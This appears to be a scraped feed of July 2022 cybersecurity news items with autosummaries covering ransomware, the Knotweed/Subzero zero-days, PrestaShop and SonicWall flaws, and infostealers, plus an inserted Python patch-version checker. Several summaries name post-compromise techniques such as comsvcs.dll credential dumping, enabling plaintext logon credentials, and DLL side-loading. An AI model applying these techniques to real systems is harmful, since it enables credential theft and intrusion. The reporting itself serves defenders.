                Microsoft linked the recently discovered Raspberry Robin Windows malware to the notorious Evil Corp operation. On July 26, 2022, Microsoft researchers discovered that the FakeUpdates malware was being distributed via the Raspberry Robin malware. Raspberry Robin is a Windows worm discovered by cybersecurity researchers from Red Canary; the malware propagates through removable USB devices. The malicious code […]

                The post Microsoft experts linked the Raspberry Robin malware to Evil Corp operation appeared first on Security Affairs.

                "

                Autosummary: In many cases, the infection process led to the deployment of custom Cobalt Strike loaders attributed to DEV-0243, which falls under the activity the experts track as “EvilCorp.” Around November 2021, DEV-0243 started to deploy the LockBit 2.0 RaaS payload; experts believe that the DEV-0243 threat actors (the “EvilCorp” activity group) used a RaaS payload to avoid attribution. "


                CISA warns of critical Confluence bug exploited in attacks

                exploits
                2022-07-29 https://www.bleepingcomputer.com/news/security/cisa-warns-of-critical-confluence-bug-exploited-in-attacks/
                CISA has added a critical Confluence vulnerability tracked as CVE-2022-26138 to its list of bugs abused in the wild, a flaw that can provide remote attackers with hardcoded credentials following successful exploitation. [...] "

                Autosummary: "


                The ransomware landscape changes as fewer victims decide to pay

                exploits ransomware
                2022-07-29 https://blog.malwarebytes.com/ransomware/2022/07/the-ransomware-landscape-changes-as-less-victims-decide-to-pay/

                A considerable drop in the median of ransom payments and several other circumstances are causing the ransomware landscape to change.

                The post The ransomware landscape changes as fewer victims decide to pay appeared first on Malwarebytes Labs.

                "

                Autosummary: Groups like Conti were absorbed by existing and new Ransomware-as-a-Service (RaaS) groups such as Black Basta, BlackCat, Hive, and Quantum.
                Different targets
                With the shift from large botnets as the initial foothold to targeted attacks, affiliates can not only be more picky when it comes to their victims; some can also choose between RaaS providers or decide to proceed on their own. "


                LockBit ransomware abuses Windows Defender to load Cobalt Strike

                exploits ransomware
                2022-07-29 https://www.bleepingcomputer.com/news/security/lockbit-ransomware-abuses-windows-defender-to-load-cobalt-strike/
                Security analysts have observed an affiliate of the LockBit 3.0 ransomware operation abusing a Windows Defender command line tool to decrypt and load Cobalt Strike beacons on the target systems. [...] "

                Autosummary: "


                Kansas MSP shuts down cloud services to fend off cyberattack

                ciber
                2022-07-28 https://www.bleepingcomputer.com/news/security/kansas-msp-shuts-down-cloud-services-to-fend-off-cyberattack/
                US managed service provider NetStandard suffered a cyberattack that caused the company to shut down its MyAppsAnywhere cloud services, consisting of hosted Dynamics GP, Exchange, Sharepoint, and CRM services. [...] "

                Autosummary: MyAppsAnywhere services, which include Hosted GP, Hosted CRM, Hosted Exchange, and Hosted Sharepoint, will be offline until further notice. "


                1 in 3 employees don’t understand why cybersecurity is important

                ciber
                2022-07-28 https://www.helpnetsecurity.com/2022/07/28/employees-dont-understand-why-cybersecurity-is-important/

                According to a new Tessian report, 30% of employees do not think they personally play a role in maintaining their company’s cybersecurity posture. What’s more, only 39% of employees say they’re very likely to report a security incident, making investigation and remediation even more challenging and time-consuming for security teams. When asked why, 42% of employees said they wouldn’t know if they had caused an incident in the first place, and 25% say they just don’t … More

                The post 1 in 3 employees don’t understand why cybersecurity is important appeared first on Help Net Security.

                "

                Autosummary: What’s more, only 39% of employees say they’re very likely to report a security incident, making investigation and remediation even more challenging and time-consuming for security teams. "


                Infortrend introduces WORM and MFA features on EonStor GS to keep data safe from ransomware

                exploits ransomware
                2022-07-28 https://www.helpnetsecurity.com/2022/07/28/infortrend-eonstor-gs/

                Infortrend Technology introduces immutable object storage, or write-once-read-many (WORM), and multi-factor authentication (MFA) security features to its EonStor GS unified storage solutions, ensuring the safety of stored data, specifically against ransomware. Ransomware attacks today are still rising, showing that traditional ways to prevent these threats, such as firewalls and antivirus, are not foolproof. Therefore, enterprises have started utilizing immutable or WORM storage repositories to take advantage of their write-once-read-many characteristics to protect archived … More

                The post Infortrend introduces WORM and MFA features on EonStor GS to keep data safe from ransomware appeared first on Help Net Security.

                "

                Autosummary: "


                Cybersecurity is becoming a top priority among critical infrastructure operators

                ciber
                2022-07-28 https://www.helpnetsecurity.com/2022/07/28/cybersecurity-critical-infrastructure-video/

                Increased cyber threats and government directives have made cybersecurity a top priority among critical infrastructure organizations. This Help Net Security video highlights how leaders rethink their approach to cybersecurity for operations.

                The post Cybersecurity is becoming a top priority among critical infrastructure operators appeared first on Help Net Security.

                "

                Autosummary: "


                European firm DSIRF behind the attacks with Subzero surveillance malware

                exploits
                2022-07-28 https://securityaffairs.co/wordpress/133736/malware/dsirf-behind-subzero-malware.html

                Microsoft linked a private-sector offensive actor (PSOA) to attacks using multiple zero-day exploits for its Subzero malware. The Microsoft Threat Intelligence Center (MSTIC) and the Microsoft Security Response Center (MSRC) researchers linked a threat group known as Knotweed to an Austrian surveillance firm named DSIRF, known for using multiple Windows and Adobe zero-day exploits. The […]

                The post European firm DSIRF behind the attacks with Subzero surveillance malware appeared first on Security Affairs.

                "

                Autosummary: Microsoft researchers observed a variety of post-compromise actions on infected systems:
                - Setting of UseLogonCredential to “1” to enable plaintext credentials
                - Credential dumping via comsvcs.dll
                - Attempt to access emails with dumped credentials from a KNOTWEED IP address
                - Using Curl to download KNOTWEED tooling from public file shares such as vultrobjects[.]com
                - Running PowerShell scripts directly from a GitHub gist created by an account associated with DSIRF
                Researchers from threat intelligence firm RiskIQ, using passive DNS data related to Knotweed attacks, linked the C2 infrastructure used by the malware since February 2020 to DSIRF. “In 2021, MSRC received a report of two Windows privilege escalation exploits (CVE-2021-31199 and CVE-2021-31201) being used in conjunction with an Adobe Reader exploit (CVE-2021-28550), all of which were patched in June 2021. "


                Microsoft Uncovers Austrian Company Exploiting Windows and Adobe Zero-Day Exploits

                exploits
                2022-07-28 https://thehackernews.com/2022/07/microsoft-uncover-austrian-company.html
                A cyber mercenary that "ostensibly sells general security and information analysis services to commercial customers" used several Windows and Adobe zero-day exploits in limited and highly-targeted attacks against European and Central American entities. The company, which Microsoft describes as a private-sector offensive actor (PSOA), is an Austria-based outfit called DSIRF that’s linked to the "

                Autosummary: The company, which Microsoft describes as a private-sector offensive actor (PSOA), is an Austria-based outfit called DSIRF that’s linked to the development and attempted sale of a piece of cyberweapon referred to as Subzero, which can be used to hack targets’ phones, computers, and internet-connected devices. "


                Fortress Information Security and NetRise form a partnership to extend XIoT offering

                industry
                2022-07-28 https://www.helpnetsecurity.com/2022/07/29/netrise-fortress-information-security/

                NetRise and Fortress Information Security form a strategic partnership. This partnership gives Fortress Information Security’s global customers access to the firmware binary analysis platform. The NetRise team’s experience in data science, machine learning, and software reverse engineering expands Fortress customers’ ability to identify and catalog risk across a much larger set of devices and images. NetRise gains access to a robust route to market for the power, oil and gas, and manufacturing clients that Fortress serves, … More

                The post Fortress Information Security and NetRise form a partnership to extend XIoT offering appeared first on Help Net Security.

                "

                Autosummary: "


                The global average cost of a data breach reaches an all-time high of $4.35 million

                financial
                2022-07-27 https://www.helpnetsecurity.com/2022/07/27/2022-cost-of-a-data-breach-report/

                IBM Security released the 2022 Cost of a Data Breach Report, revealing costlier and higher-impact data breaches than ever before, with the global average cost of a data breach reaching an all-time high of $4.35 million for studied organizations. With breach costs increasing nearly 13% over the last two years of the report, the findings suggest these incidents may also be contributing to rising costs of goods and services. In fact, 60% of studied organizations … More

                The post The global average cost of a data breach reaches an all-time high of $4.35 million appeared first on Help Net Security.

                "

                Autosummary: 2022 Cost of a Data Breach Report: Key findings
                Critical infrastructure lags in zero trust: Almost 80% of critical infrastructure organizations studied don’t adopt zero trust strategies, seeing average breach costs rise to $5.4 million – a $1.17 million increase compared to those that do.
                Phishing becomes costliest breach cause: While compromised credentials continued to reign as the most common cause of a breach (19%), phishing was the second (16%) and the costliest cause, leading to $4.91 million in average breach costs for responding organizations. "


                How SMBs are evolving their cybersecurity operations practices

                ciber
                2022-07-27 https://www.helpnetsecurity.com/2022/07/27/smb-cybersecurity-operations-practices/

                While 81% of SMBs are monitored by a security operations center (SOC), 57% do not operate 24 hours a day, 7 days a week. Considering that 69% of SMBs feel they are facing critical and expanding cybersecurity threats and 75% say cyberattacks have increased in the past three years, the lack of 24/7 coverage continues to put SMBs at risk, according to a survey by Forrester and Pondurance. Cybercriminals and threat actors work around the … More

                The post How SMBs are evolving their cybersecurity operations practices appeared first on Help Net Security.

                "

                Autosummary: By engaging the right security operations partners, respondents expect to see increased customer trust (49%), reduced risk (47%), increased revenue (45%), improved efficiencies (44%) and increased employee engagement (44%). "


                T-Mobile agrees to pay customers $350 million in settlement over data breach

                financial
                2022-07-27 https://blog.malwarebytes.com/reports/2022/07/t-mobile-agrees-to-pay-customers-350-million-in-settlement-over-data-breach/

                T-Mobile has proposed to settle its 2021 data breach by paying $350 million, along with an incremental spend of $150 million in security.

                The post T-Mobile agrees to pay customers $350 million in settlement over data breach appeared first on Malwarebytes Labs.

                "

                Autosummary: Posted: July 27, 2022. T-Mobile has proposed to settle its 2021 data breach by paying $350 million, along with an incremental spend of $150 million in security. "


                New Ducktail Infostealer Malware Targeting Facebook Business and Ad Accounts

                exploits
                2022-07-27 https://thehackernews.com/2022/07/new-ducktail-infostealer-malware.html
                Facebook business and advertising accounts are at the receiving end of an ongoing campaign dubbed Ducktail designed to seize control as part of a financially driven cybercriminal operation.  "The threat actor targets individuals and employees that may have access to a Facebook Business account with an information-stealer malware," Finnish cybersecurity company WithSecure (formerly F-Secure "

                Autosummary: It works by scanning for installed browsers such as Google Chrome, Microsoft Edge, Brave Browser, and Mozilla Firefox to extract all the stored cookies and access tokens, alongside stealing information from the victim’s personal Facebook account such as name, email address, date of birth, and user ID. "


                Taking the Risk-Based Approach to Vulnerability Patching

                exploits
                2022-07-27 https://thehackernews.com/2022/07/taking-risk-based-approach-to.html
                Software vulnerabilities are a major threat to organizations today. The cost of these threats is significant, both financially and in terms of reputation.Vulnerability management and patching can easily get out of hand when the number of vulnerabilities in your organization is in the hundreds of thousands of vulnerabilities and tracked in inefficient ways, such as using Excel spreadsheets or "

                Autosummary:
                - The exposure of the asset
                - The business sensitivity of the asset
                - The severity of the vulnerability reported against the asset
                - The availability of an exploit for the vulnerability reported
                - The complexity of the exploit, if it is available
                - The taxonomy of the vulnerability reported
                * Asset could be anything within your organization, like a web application, mobile application, code repository, router, server, database, etc.
                Time spent to prioritize vulnerabilities
                An example of a high-priority vulnerability would be one where the affected asset is publicly exposed and has critical business sensitivity, the vulnerability severity is critical, an exploit is available, and exploitation does not require user interaction or authentication/privileges. "


                The strange similarities between Lockbit 3.0 and Blackmatter ransomware

                exploits ransomware
                2022-07-27 https://securityaffairs.co/wordpress/133697/malware/lockbit-3-0-blackmatter-ransomware.html

                Researchers found similarities between LockBit 3.0 ransomware and BlackMatter, which is a rebranded variant of the DarkSide ransomware. Cybersecurity researchers have found similarities between the latest version of the LockBit ransomware, LockBit 3.0, and the BlackMatter ransomware. The LockBit 3.0 ransomware was released in June with important novelties such as a bug bounty program, Zcash payment, and new extortion […]

                The post The strange similarities between Lockbit 3.0 and Blackmatter ransomware appeared first on Security Affairs.

                "

                Autosummary: “With the release of this latest variant — and the launch of LockBit’s bug bounty program, which rewards its affiliates — we expect the LockBit ransomware group to be even more active in the coming days.” concludes the report. "


                Microsoft: Windows, Adobe zero-days used to deploy Subzero malware

                exploits
                2022-07-27 https://www.bleepingcomputer.com/news/microsoft/microsoft-windows-adobe-zero-days-used-to-deploy-subzero-malware/
                Microsoft has linked a threat group it tracks as Knotweed to a cyber mercenary outfit (aka private-sector offensive actor) named DSIRF, targeting European and Central American entities using a malware toolset dubbed Subzero. [...] "

                Autosummary: On systems where Knotweed deployed its malware, Microsoft has observed a variety of post-compromise actions, including:
                - Setting of UseLogonCredential to "1" to enable plaintext credentials
                - Credential dumping via comsvcs.dll
                - Attempt to access emails with dumped credentials from a KNOTWEED IP address
                - Using Curl to download KNOTWEED tooling from public file shares such as vultrobjects[.]com
                - Running PowerShell scripts directly from a GitHub gist created by an account associated with DSIRF
                Among the zero-days used in Knotweed campaigns, Microsoft highlights the recently patched CVE-2022-22047, which helped the attackers escalate privileges, escape sandboxes, and gain system-level code execution. "


                PrestaShop warns of vulnerability: Update your stores now!

                exploits
                2022-07-27 https://blog.malwarebytes.com/cybercrime/2022/07/prestashop-warns-of-vulnerability-update-your-stores-now/

                We take a look at a security advisory from PrestaShop which warns of compromised stores and redirected payment data.

                The post PrestaShop warns of vulnerability: Update your stores now! appeared first on Malwarebytes Labs.

                "

                Autosummary: The exploit has its own CVE, known as CVE-2022-36408, and (from PrestaShop’s security advisory) relates to a “previously unknown vulnerability chain that we are fixing“. "


                Simplifying the fight against ransomware: An expert explains

                exploits ransomware
                2022-07-27 https://blog.malwarebytes.com/business/2022/07/simplifying-the-fight-against-ransomware-an-expert-explains/

                In this post, a security expert breaks down three tips on how businesses can have an easier time dealing with ransomware attacks.

                The post Simplifying the fight against ransomware: An expert explains appeared first on Malwarebytes Labs.

                "

                Autosummary: Finally, these features are valuable for detecting and thwarting all malware, not just ransomware:
                - Exploit prevention
                - Behavioral detection of never-before-seen malware
                - Malicious website blocking
                - Brute force protection
                On the ease-of-use front, Robert Zamani, Regional Vice President, Americans Solutions Engineering at Malwarebytes, also has four suggestions when choosing an EDR platform: Ask about the time required to set up the management console and whether it’s cloud-based.
                Choose an effective and easy-to-use Endpoint Detection and Response (EDR) software: When it comes to ransomware, resource-constrained organizations with small-to-non-existent security teams are in greater need of EDR, but many EDR products are designed for large enterprises with large and highly-skilled security teams.
                Avoid common mistakes in prevention, detection and response: Often, a customer who gets hit with ransomware has security software but they either have it disabled or it’s outdated or limited in its ability, thanks to poor configuration, Kujawa says.
                The importance of “knowing thy enemy”: Most ransomware attacks are not sophisticated, state-sponsored cyber operations, Kujawa says. "


                These 28+ Android Apps with 10 Million Downloads from the Play Store Contain Malware

                exploits
                2022-07-27 https://thehackernews.com/2022/07/these-28-android-apps-with-10-million.html
                As many as 30 malicious Android apps with cumulative downloads of nearly 10 million have been found on the Google Play Store distributing adware. "All of them were built into various programs, including image-editing software, virtual keyboards, system tools and utilities, calling apps, wallpaper collection apps, and others," Dr.Web said in a Tuesday write-up. While masquerading as innocuous "

                Autosummary:
                - Photo Editor - Design Maker (gb.twentynine.redaktoridea)
                - Photo Editor & Background Eraser (de.photoground.twentysixshot)
                - Photo & Exif Editor (de.xnano.photoexifeditornine)
                - Photo Editor - Filters Effects (de.hitopgop.sixtyeightgx)
                - Photo Filters & Effects (de.sixtyonecollice.cameraroll)
                - Photo Editor : Blur Image (de.instgang.fiftyggfife)
                - Photo Editor : Cut, Paste (de.fiftyninecamera.rollredactor)
                - Emoji Keyboard: Stickers & GIF (gb.crazykey.sevenboard)
                - Neon Theme Keyboard (com.neonthemekeyboard.app)
                - Neon Theme - Android Keyboard (com.androidneonkeyboard.app)
                - Cashe Cleaner (com.cachecleanereasytool.app)
                - Fancy Charging (com.fancyanimatedbattery.app)
                - FastCleaner: Cashe Cleaner (com.fastcleanercashecleaner.app)
                - Call Skins - Caller Themes (com.rockskinthemes.app)
                - Funny Caller (com.funnycallercustomtheme.app)
                - CallMe "


                New ‘Robin Banks’ phishing service targets BofA, Citi, and Wells Fargo

                financial
                2022-07-27 https://www.bleepingcomputer.com/news/security/new-robin-banks-phishing-service-targets-bofa-citi-and-wells-fargo/
                A new phishing as a service (PhaaS) platform named "Robin Banks" has been launched, offering ready-made phishing kits targeting the customers of well-known banks and online services. [...] "

                Autosummary: The targeted entities include Citibank, Bank of America, Capital One, Wells Fargo, PNC, U.S. Bank, Lloyds Bank, the Commonwealth Bank in Australia, and Santander. "


                Messaging Apps Tapped as Platform for Cybercriminal Activity

                ciber
                2022-07-27 https://threatpost.com/messaging-apps-cybercriminals/180303/
                Built-in Telegram and Discord services are fertile ground for storing stolen data, hosting malware and using bots for nefarious purposes. "

                Autosummary: One stealer observed by Intel 471, known as Blitzed Grabber, uses Discord’s webhooks feature to deposit data lifted by the malware, including autofill data, bookmarks, browser cookies, VPN client credentials, payment card information, cryptocurrency wallets and passwords, researchers said. Once the malware infects a system, threat actors can swipe passwords, session cookies, login credentials and credit-card details from popular browsers (including Google Chrome, Chromium, Opera, Slimjet and Vivaldi) and then deposit that stolen info “into a Telegram channel of their choosing,” researchers said. "


                Cash App fraud: 10 common scams to watch out for

                financial
                2022-07-27 https://www.welivesecurity.com/2022/07/27/cash-app-fraud-scams-watch-out/

                It pays to be careful – here’s how you can stay safe from fake giveaways, money flipping scams and other cons that fraudsters use to trick payment app users out of their hard-earned cash

                The post Cash App fraud: 10 common scams to watch out for appeared first on WeLiveSecurity

                "

                Autosummary: In some cases, sugar daddy scammers, too, may ask their targets to make upfront payments using Cash App or another peer-to-peer payment app with the promise of receiving larger sums of money later.
                The rise of Cash App
                Cash App is used by tens of millions of people each month, especially because, among other things, the app allows users to send and receive money instantly. It pays to be careful – here’s how you can stay safe from fake giveaways, money flipping scams and other cons that fraudsters use to trick payment app users out of their hard-earned cash. For today’s consumers, convenience is king. And the firm’s support team will never request a sign-in code, PIN, Social Security Number (SSN), a payment or the downloading of a remote access app. "


                Uber’s former head of security faces fraud charges after allegedly covering up data breach

                financial
                2022-07-27 https://www.bitdefender.com/blog/hotforsecurity/ubers-former-head-of-security-faces-fraud-charges-after-allegedly-covering-up-data-breach/
                The former Chief Security Officer of Uber is facing wire fraud charges over allegations that he covered up a data breach that saw hackers steal the records of 57 million passengers and drivers. Read more in my article on the Hot for Security blog. "

                Autosummary: The US Department of Justice this week, announced that it would not be prosecuting Uber over the data breach, after the firm "admitted to and accepted responsibility for the acts of its officers, directors, employees, and agents in concealing its 2016 data breach from the FTC. "


                CosmicStrand UEFI malware found in Gigabyte, ASUS motherboards

                exploits industry
                2022-07-26 https://www.bleepingcomputer.com/news/security/cosmicstrand-uefi-malware-found-in-gigabyte-asus-motherboards/
                Since at least 2016, Chinese-speaking hackers have been using malware that lies virtually undetected in the firmware images of some motherboards, one of the most persistent kinds of threat, commonly known as a UEFI rootkit. [...] "

                Autosummary: [Figure: Overview of CosmicStrand UEFI malware execution (source: Kaspersky)]
                Mark Lechtik, a former Kaspersky reverse engineer, now at Mandiant, who was involved in the research, explains that the compromised firmware images came with a modified CSMCORE DXE driver, which enables a legacy boot process. "


                Infosec pros want more industry cooperation and support for open standards

                industry
                2022-07-26 https://www.helpnetsecurity.com/2022/07/26/industry-cooperation-open-standards/

                Driven by security operations complexity, 46% of organizations are consolidating or plan on consolidating the number of vendors they do business with. As a result of this drive toward security technology consolidation, 77% of infosec pros would like to see more industry cooperation and support for open standards promoting interoperability. As thousands of cybersecurity technology vendors compete against each other across numerous security product categories, organizations are aiming to optimize all security technologies in their … More

                The post Infosec pros want more industry cooperation and support for open standards appeared first on Help Net Security.

                "

                Autosummary: (51%) In addition:
                - 53% tend to purchase or will in the future purchase security technology platforms rather than best-of-breed products
                - 84% believe that a product’s integration capabilities are important and 86% of respondents say it is either critical or important that best-of-breed products are built for integration with other products
                - After cost (46%), product integration capabilities are the most important security product consideration for 37% of security professionals
                Evaluating “enterprise-class” security vendors
                As the security technology market consolidates, “centers of gravity” will become established around a few large vendors and affect future buying strategies; organizations will place more bets on fewer security technology vendors. "


                Hackers Exploit PrestaShop Zero-Day to Steal Payment Data from Online Stores

                exploits
                2022-07-26 https://thehackernews.com/2022/07/hackers-exploit-prestashop-zero-day-to.html
                Malicious actors are exploiting a previously unknown security flaw in the open source PrestaShop e-commerce platform to inject malicious skimmer code designed to swipe sensitive information. "Attackers have found a way to use a security vulnerability to carry out arbitrary code execution in servers running PrestaShop websites," the company noted in an advisory published on July 22. PrestaShop is "

                Autosummary: "


                Zero Day attacks target online stores using PrestaShop

                exploits
                2022-07-26 https://securityaffairs.co/wordpress/133669/hacking/prestashop-zero-day.html

                Threat actors are exploiting a zero-day vulnerability to steal payment information from sites using the open source e-commerce platform PrestaShop. Threat actors are targeting websites using the open source e-commerce platform PrestaShop by exploiting a zero-day flaw, tracked as CVE-2022-36408, that allows arbitrary code execution and can potentially be used to steal customers’ payment information. PrestaShop is currently used by 300,000 shops worldwide […]

                The post Zero Day attacks target online stores using PrestaShop appeared first on Security Affairs.

                "

                Autosummary: Threat actors are targeting websites using the open source e-commerce platform PrestaShop by exploiting a zero-day flaw, tracked as CVE-2022-36408, that allows arbitrary code execution and can potentially be used to steal customers’ payment information. "


                LockBit claims ransomware attack on Italian tax agency

                exploits ransomware
                2022-07-26 https://www.bleepingcomputer.com/news/security/lockbit-claims-ransomware-attack-on-italian-tax-agency/
                Italian authorities are investigating claims made by the LockBit ransomware gang that they breached the network of the Italian Internal Revenue Service (L’Agenzia delle Entrate). [...] "

                Autosummary: "


                LinkedIn phishing target employees managing Facebook Ad Accounts

                financial
                2022-07-26 https://www.bleepingcomputer.com/news/security/linkedin-phishing-target-employees-managing-facebook-ad-accounts/
                A new phishing campaign codenamed "Ducktail" is underway, targeting professionals on LinkedIn to take over Facebook business accounts that manage advertising for the company. [...] "

                Autosummary: [Figure: Code to generate login requests (WithSecure)]
                The stolen information includes the cookies, IP address, account information (name, email, birthday, user ID), 2FA codes, and geolocation data, essentially allowing the threat actor to continue this access from their machine. "


                SmokeLoader Infecting Targeted Systems with Amadey Info-Stealing Malware

                exploits
                2022-07-26 https://thehackernews.com/2022/07/smokeloader-infecting-targeted-systems.html
                An information-stealing malware called Amadey is being distributed by means of another backdoor called SmokeLoader. The attacks hinge on tricking users into downloading SmokeLoader that masquerades as software cracks, paving the way for the deployment of Amadey, researchers from the AhnLab Security Emergency Response Center (ASEC) said in a report published last week. Amadey, a "

                Autosummary: "


                No More Ransom helps millions of ransomware victims in 6 years

                exploits ransomware
                2022-07-26 https://www.bleepingcomputer.com/news/security/no-more-ransom-helps-millions-of-ransomware-victims-in-6-years/
The No More Ransom project celebrates its sixth anniversary today after helping millions of ransomware victims recover their files for free. [...]



                Phishing Attacks Skyrocket with Microsoft and Facebook as Most Abused Brands

                financial
                2022-07-26 https://threatpost.com/popular-bait-in-phishing-attacks/180281/
Instances of phishing attacks leveraging the Microsoft brand increased 266 percent in Q1 compared to the year prior.

Autosummary: Other top abused brands in phishing attacks include Credit Agricole, WhatsApp, and French telecommunications company Orange.


IoT Botnets Fuel DDoS Attacks – Are You Prepared?

                industry
                2022-07-26 https://threatpost.com/ddos-attacks-prepared/180273/
The proliferation of IoT devices paved the way for IoT botnets that amplify today's DDoS attacks, raising the risk that a sophisticated DDoS attack and a prolonged service outage will hold back business growth.

Autosummary: Recommended measures include monitoring login attempts and watching for spikes, keeping IoT devices on protected networks, and performing continuous security testing on IoT devices. DDoS attacks are the standard intent of an IoT botnet. Further, most IoT devices include serious security issues like weak passwords, open access to management systems, default administrative credentials, or weak security configurations.


                New Android malware apps installed 10 million times from Google Play

                exploits
                2022-07-26 https://www.bleepingcomputer.com/news/security/new-android-malware-apps-installed-10-million-times-from-google-play/
A new batch of malicious Android apps filled with adware and malware was found on the Google Play Store that have been installed close to 10 million times on mobile devices. [...]

Autosummary: Two of the listed apps, "Water Reminder" and "Yoga – For Beginner to Advanced," are still on the Play Store, with 100,000 and 50,000 downloads, respectively.


                SonicWall urges customers to patch critical SQL injection bug ASAP

                exploits
                2022-07-26 https://blog.malwarebytes.com/exploits-and-vulnerabilities/2022/07/sonicwall-urges-clients-to-patch-critical-sql-injection-bug-asap/

                SonicWall GMS and Analytics are vulnerable to an SQL injection bug, tracked as CVE-2022-22280.


Autosummary: According to the SonicWall advisory, customers using Analytics 2.5.0.3-2520 or earlier and/or GMS 9.3.1-SP2-Hotfix1 or earlier are advised to update to the patched versions, Analytics 2.5.0.3-2520-Hotfix1 and GMS 9.3.1-SP2-Hotfix-2, respectively.
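A quick way to turn the advisory's version strings into a fleet-wide patch check, as an added example that is not SonicWall's tooling: the fixed releases below are the ones named in the advisory summary, while the version grammar, the ordering rule (within the same base version a higher build, SP or hotfix number is newer) and the inventory rows are assumptions made for illustration.

```python
"""Patch-level check for CVE-2022-22280 from SonicWall-style version strings.
Added example, not SonicWall's tooling."""
import re
from typing import NamedTuple

# Fixed releases named in the advisory summary above.
FIXED = {
    "analytics": "2.5.0.3-2520-Hotfix1",
    "gms": "9.3.1-SP2-Hotfix-2",
}

# Grammar inferred from the four strings on the page (assumption): dotted base
# version, optional "-<build>", optional "-SP<n>", optional "-Hotfix<n>" or
# "-Hotfix-<n>".
VERSION_RE = re.compile(
    r"^(?P<base>\d+(?:\.\d+)*)"
    r"(?:-(?P<build>\d+))?"
    r"(?:-SP(?P<sp>\d+))?"
    r"(?:-Hotfix-?(?P<hotfix>\d+))?$",
    re.IGNORECASE,
)


class Version(NamedTuple):
    base: tuple
    build: int
    sp: int
    hotfix: int


def parse_version(text: str) -> Version:
    """Parse a version string into a tuple that compares element by element."""
    m = VERSION_RE.match(text.strip())
    if not m:
        raise ValueError(f"unrecognised version string: {text!r}")
    base = tuple(int(part) for part in m["base"].split("."))
    return Version(
        base,
        int(m["build"] or 0),
        int(m["sp"] or 0),
        int(m["hotfix"] or 0),
    )


def is_patched(product: str, installed: str) -> bool:
    """True when `installed` is at or above the fixed release for `product`.

    Assumption (not stated on the page): a missing component counts as 0 and
    a higher build, SP or hotfix number is newer, so "2.5.0.3-2520" sorts
    below "2.5.0.3-2520-Hotfix1" and "9.3.1-SP2-Hotfix1" below "-Hotfix-2".
    """
    return parse_version(installed) >= parse_version(FIXED[product.lower()])


# Constructed inventory rows: (hostname, product, version reported by the host).
SAMPLE_INVENTORY = [
    ("gms-01", "gms", "9.3.1-SP2-Hotfix1"),
    ("gms-02", "gms", "9.3.1-SP2-Hotfix-2"),
    ("analytics-01", "analytics", "2.5.0.3-2520"),
    ("analytics-02", "analytics", "2.5.0.3-2520-Hotfix1"),
]


def unpatched_hosts(inventory=SAMPLE_INVENTORY) -> list:
    """Return the hostnames still running a vulnerable build."""
    return [host for host, product, ver in inventory if not is_patched(product, ver)]


if __name__ == "__main__":
    for host in unpatched_hosts():
        print(f"{host}: vulnerable to CVE-2022-22280, upgrade required")
```

Feed it whatever your asset inventory exports for the two products; anything that does not match the grammar raises rather than silently passing, which is the safer failure mode for a patch check.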


                Experts Find Similarities Between New LockBit 3.0 and BlackMatter Ransomware

                exploits ransomware
                2022-07-26 https://thehackernews.com/2022/07/experts-find-similarities-between.html
Cybersecurity researchers have pointed to similarities between the latest iteration of the LockBit ransomware and BlackMatter, a rebranded variant of the DarkSide ransomware strain that closed shop in November 2021. The new version of LockBit, called LockBit 3.0 aka LockBit Black, was released in June 2022, launching a brand new leak site and what's the very first ransomware bug bounty program,

Autosummary: "Latin America has seen the largest increase in attacks, spotting one out of 23 organizations impacted weekly, a 43% increase YoY, compared to one out of 33 in Q2 2021, followed by Asia region that has seen a 33% increase YoY, reaching one out of 17 organizations impacted weekly," the Israeli cybersecurity firm said.


                4 Steps Financial Industry Can Take to Cope With Their Growing Attack Surface

                financial industry
                2022-07-26 https://thehackernews.com/2022/07/4-steps-financial-industry-can-take-to.html
The financial services industry has always been at the forefront of technology adoption, but the 2020 pandemic accelerated the widespread adoption of mobile banking apps, chat-based customer service, and other digital tools. Adobe's 2022 FIS Trends Report, for instance, found that more than half of the financial services and insurance firms surveyed experienced a notable increase in digital/mobile

Autosummary: Here's the roadmap that financial institutions like Sander Capital Management are following. Step 1 — knowing their attack surface: using Pentera to map their web-facing attack surface, they're gathering a complete understanding of their domains, IPs, networks, services, and websites. Manual penetration testing allows organizations to see how a bank's controls, for example, stand up to a real-world attack, while providing the added input of the attacker's perspective. In most cases, a cybersecurity team will only receive a CVSS severity rating (none, low, medium, high, or critical) for each issue detected by the scan.


                Novel Malware Hijacks Facebook Business Accounts

                exploits
                2022-07-26 https://threatpost.com/malware-hijacks-facebook/180285/
Newly discovered malware linked to Vietnamese threat actors targets users through a LinkedIn phishing campaign to steal data and admin privileges for financial gain.

Autosummary: Attackers also can use information such as stolen session cookies, access tokens, 2FA codes, user agents, IP address and geolocation, as well as general account information, to cloak and impersonate the victim, researchers said. The first general information-stealing component scans an infected machine for Google Chrome, Microsoft Edge, Brave Browser or Firefox and, for each one it finds, extracts all stored cookies, including any Facebook session cookie.


Threat actors leverage DLL side-loading to spread Qakbot malware

                exploits
                2022-07-26 https://securityaffairs.co/wordpress/133680/malware/dll-sideloading-spread-qakbot.html

                Qakbot malware operators are using the Windows Calculator to side-load the malicious payload on target systems. Security expert ProxyLife and Cyble researchers recently uncovered a Qakbot campaign that was leveraging the Windows 7 Calculator app for DLL side-loading attacks. Dynamic-link library (DLL) side-loading is an attack method that takes advantage of how Microsoft Windows applications handle DLL […]




                Minimizing risk: Key cybersecurity-related M&A considerations

                ciber
                2022-07-25 https://www.helpnetsecurity.com/2022/07/25/cybersecurity-related-ma-considerations-video/

                Global M&A hit new highs in 2021 reaching an eye-popping $5.1 trillion in total deal value, according to PwC. With economic headwinds leaving acquisition as the only viable exit, further consolidation in the market is inevitable. One thing that typically gets overlooked in that M&A frenzy, is the technical difficulties of inheriting digital assets of the acquired company and the cybersecurity risk that comes with it. In this Help Net Security video, Lenny Zeltser, CISO … More



                Roaming Mantis Financial Hackers Targeting Android and iPhone Users in France

                financial
                2022-07-25 https://thehackernews.com/2022/07/roaming-mantis-financial-hackers.html
The mobile threat campaign tracked as Roaming Mantis has been linked to a new wave of compromises directed against French mobile phone users, months after it expanded its targeting to include European countries. No fewer than 70,000 Android devices are said to have been infected as part of the active malware operation, Sekoia said in a report published last week. Attack chains involving Roaming



                Amadey malware spreads via software cracks laced with SmokeLoader

                exploits
                2022-07-25 https://securityaffairs.co/wordpress/133617/cyber-crime/amadey-malware-spreads-smokeloader.html

Operators behind the Amadey Bot malware are using SmokeLoader to distribute a new variant via software cracks and keygen sites. Amadey Bot is data-stealing malware first spotted in 2018 that also lets operators install additional payloads. The malware is sold on illegal forums; in the past, it was used […]


